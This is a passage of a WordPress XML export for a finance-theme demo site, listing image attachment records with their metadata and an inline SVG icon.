on";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/service-box2/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>903</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box2-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box2-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box2-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/service-box3/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>904</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box3-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box3-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box3-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/service-box4/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>905</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box4-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box4-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box4-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box4-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box4-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/service-box5/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>906</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box5-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box5-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box5-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box5-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box5-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/service-box6/</link>
		<pubDate>Mon, 14 Sep 2020 07:43:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>907</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:43:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:43:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/service-box6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:26:"2020/09/service-box6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:26:"service-box6-1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:26:"service-box6-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"service-box6-1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box6-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:26:"service-box6-1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/marketing-research/bg1-service-detail/</link>
		<pubDate>Wed, 16 Sep 2020 10:07:33 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>935</wp:post_id>
		<wp:post_date><![CDATA[2020-09-16 10:07:33]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-16 10:07:33]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:204;s:4:"file";s:32:"2020/09/bg1-service-detail.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:31:"bg1-service-detail-1-300x70.jpg";s:5:"width";i:300;s:6:"height";i:70;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"bg1-service-detail-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"bg1-service-detail-1-768x180.jpg";s:5:"width";i:768;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:32:"bg1-service-detail-1-600x204.jpg";s:5:"width";i:600;s:6:"height";i:204;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/organizational-audit/bg1-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 04:10:20 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>961</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:10:20]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:10:20]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1174;s:6:"height";i:540;s:4:"file";s:33:"2020/09/bg1-service-detail2.jpg";s:5:"sizes";a:6:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-300x138.jpg";s:5:"width";i:300;s:6:"height";i:138;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg1-service-detail2-1-1024x471.jpg";s:5:"width";i:1024;s:6:"height";i:471;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-768x353.jpg";s:5:"width";i:768;s:6:"height";i:353;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail2-1-600x540.jpg";s:5:"width";i:600;s:6:"height";i:540;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-service-detail2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/organizational-audit/bg2-service-detail2/</link>
		<pubDate>Thu, 17 Sep 2020 07:35:50 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>970</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 07:35:50]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 07:35:50]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-service-detail2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>959</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:33:"2020/09/bg2-service-detail2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>energy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/business-consulting/energy/</link>
		<pubDate>Thu, 17 Sep 2020 08:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/energy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>980</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[energy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/energy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/energy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 